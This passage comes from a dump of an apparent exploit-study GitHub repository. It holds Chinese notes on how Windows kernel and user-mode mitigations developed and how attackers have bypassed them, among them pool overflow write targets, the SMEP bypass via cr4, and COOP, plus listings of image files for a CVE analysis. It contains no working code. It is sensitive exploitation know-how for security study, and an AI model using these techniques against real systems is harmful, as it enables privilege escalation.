CFG 逻辑。文章认为同时满足健壮性和精确性的 CFG 难以构建,因此使用不完整指针分析构造出的 CFG 存在漏洞,间接证明了 ACICS 配件的攻击有效性。 136 | 137 | ### COOP(Counterfeit Object-oriented Programming) 138 | 139 | 专门针对 C++应用程序中虚函数表的劫持攻击思想。 140 | 文章通过建立虚假对象, 劫持已经存在的 C++虚函数表, 利用漏洞程序中的主循环配件(具备循环功能的 141 | 指令片段)反复调用以函数为粒度的功能配件, 直到完成攻击目的。 142 | 143 | 防御COOP 144 | 145 | ### TypeArmor 146 | 147 | 使用 use-def 数据流分析算法,在二进制级别构造间接函数调用目的地址的合法集 148 | 合, 从而阻止使用以函数为粒度的功能配件。另外经典的CPI也提供了防御COOP攻击的方法, 它通过保 149 | 护虚函数表指针不被恶意修改, 从源头上防御了针对 C++虚函数表劫持的攻击。 150 | 151 | ## CPI VS 信息泄露攻击 152 | 153 | -------------------------------------------------------------------------------- /History/Images/after.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/after.png -------------------------------------------------------------------------------- /History/Images/aslr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/aslr.png -------------------------------------------------------------------------------- /History/Images/before.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/before.png -------------------------------------------------------------------------------- /History/Images/bypass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/bypass.png -------------------------------------------------------------------------------- /History/Images/cfg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/cfg.png -------------------------------------------------------------------------------- /History/Images/dep-kernel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/dep-kernel.png -------------------------------------------------------------------------------- /History/Images/dep.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/dep.png 
-------------------------------------------------------------------------------- /History/Images/dkohm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/dkohm.png -------------------------------------------------------------------------------- /History/Images/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/exec.png -------------------------------------------------------------------------------- /History/Images/gs1.0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/gs1.0.png -------------------------------------------------------------------------------- /History/Images/gs1.1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/gs1.1.png -------------------------------------------------------------------------------- /History/Images/gs2.0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/gs2.0.png -------------------------------------------------------------------------------- /History/Images/guard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/guard.png -------------------------------------------------------------------------------- /History/Images/heap.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/heap.png -------------------------------------------------------------------------------- /History/Images/heap1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/heap1.png -------------------------------------------------------------------------------- /History/Images/kernel-stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/kernel-stack.png -------------------------------------------------------------------------------- /History/Images/lfh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/lfh.png -------------------------------------------------------------------------------- /History/Images/listentry.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/listentry.png -------------------------------------------------------------------------------- /History/Images/mm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/mm.png -------------------------------------------------------------------------------- /History/Images/pre.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/pre.png -------------------------------------------------------------------------------- /History/Images/rand.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/rand.png -------------------------------------------------------------------------------- /History/Images/safe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/safe.png -------------------------------------------------------------------------------- /History/Images/safeseh1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/safeseh1.png -------------------------------------------------------------------------------- /History/Images/sealed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/sealed.png -------------------------------------------------------------------------------- /History/Images/sehop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/sehop.png -------------------------------------------------------------------------------- /History/Images/sehop1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/sehop1.png 
-------------------------------------------------------------------------------- /History/Images/shellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/shellcode.png -------------------------------------------------------------------------------- /History/Images/unlink.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/unlink.png -------------------------------------------------------------------------------- /History/Images/vtg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/vtg.png -------------------------------------------------------------------------------- /History/Images/win1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win1.png -------------------------------------------------------------------------------- /History/Images/win2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win2.png -------------------------------------------------------------------------------- /History/Images/win3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win3.png -------------------------------------------------------------------------------- /History/Images/win7.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win7.png -------------------------------------------------------------------------------- /History/Images/win8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/Images/win8.png -------------------------------------------------------------------------------- /History/PAC/pac.md: -------------------------------------------------------------------------------- 1 | ## ref: 2 | 3 | https://hardenedlinux.github.io/gnu/toolchains/security/2017/06/13/ARM_PA.html 4 | -------------------------------------------------------------------------------- /History/PAC/slides_23.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/PAC/slides_23.pdf -------------------------------------------------------------------------------- /History/PAC/whitepaper-pointer-authentication-on-armv8-3.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/History/PAC/whitepaper-pointer-authentication-on-armv8-3.pdf -------------------------------------------------------------------------------- /History/Windows漏洞防护与利用发展史-内核层.md: -------------------------------------------------------------------------------- 1 | 总的来说,内核层和应用层有着诸多相似的地方,但是也有着自己的特点,比如空指针解引用漏洞,SMEP防护机制等。 2 | 3 | 有趣的是,一些相同原理的防护机制,滞后于对应的应用层比如:Safe Unlink在win7才开始加入到内核防护中,应用层的Safe unlink防护早在WinXP就加入了。 4 | 5 | 下面按照和应用层相同的思路介绍,分为劫持执行流和执行shellcode两部分。但是要注意的是: 6 | 可能不需要执行shellcode,直接提权成功,比如CVE-2014-4113在win8 x64上的利用和CVE-2015-1701的利用 7 | 8 | # 获得执行流程 9 | 10 | ## 
1. 栈溢出 11 | 12 | ### 1.1 最原始利用 13 | 14 | 大量数据直至覆盖返回地址-->改写EIP,获得执行流 15 | 16 | ### 1.2 stack cookies 17 | 18 | #### 1.2.1 概念 19 | 20 | Windows XP SP2引入 21 | 类似于应用层的cookie,一个做校验的随机数 22 | 23 | #### 1.2.2 绕过方法 24 | 25 | 和应用层类似,想办法在函数返回之前触发异常 26 | 注意try catch不能捕获所有的页异常处理,在内核中引用一块无效地址会导致BSOD,所以这里有一个技巧: 27 | 28 | memcpy的时候就触发异常,不要等到函数返回的时候,或者strcat这种操作的时候 29 | 30 | ![](./Images/kernel-stack.png) 31 | 32 | #### 参考: 33 | 34 | A Guide to Kernel Exploitation Attacking the Core 35 | 36 | #### 预测cookies的值 37 | 38 | Win8 x64之前:成功率大于46%。 39 | 40 | J00ru:Windows Kernel-mode GS Cookies subverted 41 | 42 | Win8 x64之后:非常困难。 43 | 44 | 参考: 45 | 46 | mj0011,Using a Patched Vulnerability to Bypass Windows 8 x64 Driver Signature Enforcement 47 | 48 | ![](./Images/bypass.png) 49 | 50 | ## 2. 堆溢出 51 | ### 2.1 最原始利用 52 | 53 | 类似用户层堆,利用堆链表管理的特点,构造Write 4。 54 | 55 | ### 2.2 Write what 56 | 57 | 1.HalDispatchTable+4(常用) 58 | 59 | 2.修改其为shellcode的地址,然后在用户层调用 NtQueryIntervalProfile(2,X)触发shellcode执行。 60 | 61 | 3.Token+ PrivilegesOffset.Enabled 62 | 63 | 4.修改SeDebug权限,之后可以注入代码到系统进程中,完成提权 64 | Moritz Jodeit,Exploiting CVE-2014-4113 on Windows 8.1 65 | 66 | 5.LDT 67 | 6.KiDebugRoutine? 
68 | 69 | ### 2.3 Win7 之前 70 | 71 | #### 2.3.1 安全机制 72 | 73 | 似乎没有。。。 74 | 75 | #### 2.3.2 绕过方法 76 | 77 | 主要发生在ListEntry中,在下面几种堆管理的情况下,有可能将溢出变成Write4: 78 | 79 | Unlink in merge with next 80 | 81 | ![](./Images/listentry.png) 82 | 83 | Unlink in merge with previous pool chunk 84 | 85 | ![](./Images/pre.png) 86 | 87 | Unlink in allocation from ListHeads[n] free list 88 | 89 | #### 参考: 90 | 91 | SoBeIt X’con 2005 92 | Kostya Kortchinsky SyScan 2008 93 | 94 | ### 2.4 Win7 95 | 96 | #### 2.4.1 安全机制 97 | 98 | Safe Unlink 99 | 100 | 类似应用层的Safe Unlink,图示: 101 | 102 | ![](./Images/safe.png) 103 | 104 | #### 2.4.2 绕过方法 105 | 106 | 1.ListEntry Flink Overwrite 107 | 2.Lookaside Pointer Overwrite 108 | 3.PoolIndex Overwrite 109 | 4.Quota Process Pointer Overwrite 110 | 111 | #### 参考: 112 | 113 | Tarjei Mandt BH DC 2011 114 | 115 | ### 2.5 Win8 116 | 117 | #### 2.5.1 安全机制 118 | 119 | 都是针对win7上的利用做的改进。 120 | 121 | 1.Process quota pointer encoding 122 | 2.Lookaside,delay free,and pool page cookies 123 | 3.PoolIndex bounds check 124 | 4.Additional safe unlinking checks 125 | 126 | #### 2.5.2 绕过方法 127 | 128 | 1.BlockSize Attack 129 | 2.Split Chunk Attack 130 | 3.DKOHM / Object Type Confusion(重要) 131 | 132 | ![](./Images/dkohm.png) 133 | 134 | #### 参考: 135 | 136 | Tarjei Mandt BH US 2012 137 | 138 | Zhenhua 'Eric' Liu NoSuchCon 2013 139 | 140 | Nikita Tarakanov--Exploiting Hardcore Pool Corruptions in Microsoft Windows Kernel NoSuchCon 2013 141 | 142 | Nikita Tarakanov--DATA-ONLY PWNING MICROSOFT WINDOWS KERNEL: EXPLOITATION OF KERNEL POOL OVERFLOWS ON MICROSOFT WINDOWS 8.1 ZeroNights 2014 143 | 144 | ### 2.6 总结 145 | 146 | 越来越多的pool integrity checks,针对pool metadata/mechanisms的攻击越来越困难,DKOHM是一个趋势。 147 | 148 | ## 3. 
其它 149 | ### 3.1 空指针解引用 150 | 151 | #### 3.1.1 利用 152 | 153 | 这算是内核中比较特殊并且数量较大的一类漏洞了,虽然应用层也有空指针解引用漏洞,但是几乎都不能利用。而在Win8之前却是内核漏洞中很流行。 154 | 155 | 比如CVE-2014-4113、CVE-2015-0003等都是这种漏洞,形式类似: 156 | 157 | call [eax+8] // eax=0 158 | 159 | 具体可以参考这两个漏洞的利用代码,都是公开的。 160 | 161 | #### 3.1.2 防护 162 | 163 | win8 开始禁止非管理员权限的零页分配 164 | 165 | ### 3.2 UAF 166 | 167 | #### 3.2.1 利用 168 | 169 | 和应用层类似,但是也有自己特殊的地方,比如神奇的WorkerFactory 对象。 170 | 171 | 参考:0x710DDDD,CVE-2014-1767_Afd.sys_double-free_漏洞分析与利用 172 | 173 | #### 3.2.2 防护 174 | 175 | 1.Isolated Pools? 176 | 2.Reference count hardening 177 | 178 | http://blogs.technet.com/b/srd/archive/2013/11.aspx 179 | 180 | ### 3.3 竞争条件 181 | 182 | 这类漏洞一直没能找到相关的PoC,所以并不了解,可以参考: 183 | 184 | http://j00ru.vexillium.org/?p=1695 185 | 186 | # 执行shellcode 187 | 188 | 大多数的漏洞都需要这一步,也有像CVE-2014-4113在win8上面的exp,利用了漏洞本身的特点,不再需要“shellcode”了。 189 | 190 | ## 1. SMEP/SMAP 191 | ### 1.1 概念 192 | 193 | SMEP:处理器cr4寄存器和PTE结合,阻止ring0去执行ring3代码(Prevents supervisor from executing code in user pages) 194 | 195 | SMAP:Supervisor Mode Access Prevention,ring0的代码不可以read/write应用层的内存。 196 | 197 | ### 1.2 绕过方法 198 | 199 | 思路类似于绕过DEP。 200 | 201 | 1.ROP 202 | 203 | ExAllocatePoolWithTag (NonPagedExec) + memcpy+jmp 204 | 205 | clear SMEP flag in cr4 206 | 207 | 参考: 208 | http://blogs.360.cn/blog/hacking-team-part5-atmfd-0day-2/ 209 | 210 | 2.Leak and Jmp 到一个RWX的内核内存地址(Artem’s Shishkin technique) 211 | 3.Set Owner flag of PTE to 0 (MI_PTE_OWNER_KERNEL) 212 | 213 | Win8之前 214 | 215 | 通过确定的对象地址,写入一些代码 216 | 但是win8 加入了 non-paged pool NX 217 | mj0011,Reversing Windows8: Interesting Features of Kernel Security 218 | 219 | ## 2. Non-paged pool NX 220 | 221 | ### 2.1 概念 222 | 223 | non-executable non-paged pool 224 | 225 | 参考 226 | 227 | https://msdn.microsoft.com/en-us/library/windows/hardware/hh920391(v=vs.85).aspx 228 | 229 | ## 3. 
KASLR 230 | ### 3.1 概念 231 | 232 | 微软在Win8.1之前,对这方面都是很重视,第一次是在Server2008 RTM引入的。 233 | 234 | 4 bits of entropy for drivers,5 bits for NTOS/HAL 235 | 236 | ### 3.2 防护 237 | 238 | #### 3.2.1 Win7 239 | 240 | Drivers: 6 bits on x86, 8 bits on x64 241 | 242 | #### 3.2.2 Win8 243 | 244 | Biasing of kernel segment base 245 | 246 | NTOS/HAL receive 22 bits(64-bit) and 12 bits(32-bit) 247 | 248 | Various boot regions also randomized(P0 idle stack) 249 | 250 | 限制对敏感函数的调用 251 | 252 | 如果进程运行在低完整性级别以下(保护模式或增强保护模式),那么SystemModuleInformation等相关获得内核模块基址的方法都会被阻止,这样,即使攻击者在保护模式或增强保护模式下触发了内核漏洞,由于无法获得内核基址,也很难进行进一步利用。 253 | 254 | 参考: 255 | http://blogs.360.cn/blog/fixed_three_0days_in_may/ 256 | 257 | ## 4. DEP 258 | 259 | 图解: 260 | 261 | ![](./Images/dep-kernel.png) 262 | 263 | by:会飞的猫 264 | 转载请注明:http://www.cnblogs.com/flycat-2016 265 | 266 | -------------------------------------------------------------------------------- /History/afl.md: -------------------------------------------------------------------------------- 1 | 一些需要注意的地方: 2 | 3 | ## 测试用例尽可能小 4 | 5 | ## 构造字典 6 | 7 | ## 样本不是越多越好 8 | 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | exploit study. 2 | i am moonagirl. 
-------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/24442-20171206093644566-325426505.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/24442-20171206093644566-325426505.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/24442-20171208101900738-116140477.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/24442-20171208101900738-116140477.jpg -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120056941-521000199.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120056941-521000199.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120057535-1926957792.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel 
Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120057535-1926957792.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120058175-1651279641.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120058175-1651279641.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120058644-274645935.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120058644-274645935.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120059128-479937764.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120059128-479937764.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120059785-318854944.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120059785-318854944.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120100347-1097263581.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120100347-1097263581.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120100738-1402769642.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120100738-1402769642.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120101300-47970014.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120101300-47970014.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 
博客园_files/928323-20160501120102066-439387585.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102066-439387585.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102503-260248986.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102503-260248986.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102894-799784821.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120102894-799784821.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120103425-20637235.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120103425-20637235.png -------------------------------------------------------------------------------- 
/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120103894-2146368649.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120103894-2146368649.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120104410-1243386177.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120104410-1243386177.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120104863-2088752860.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120104863-2088752860.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120105285-1813557857.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 
博客园_files/928323-20160501120105285-1813557857.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120105707-991419323.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120105707-991419323.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120106019-1901645584.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120106019-1901645584.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120106769-1978294529.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120106769-1978294529.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120107425-1893723380.png: -------------------------------------------------------------------------------- 
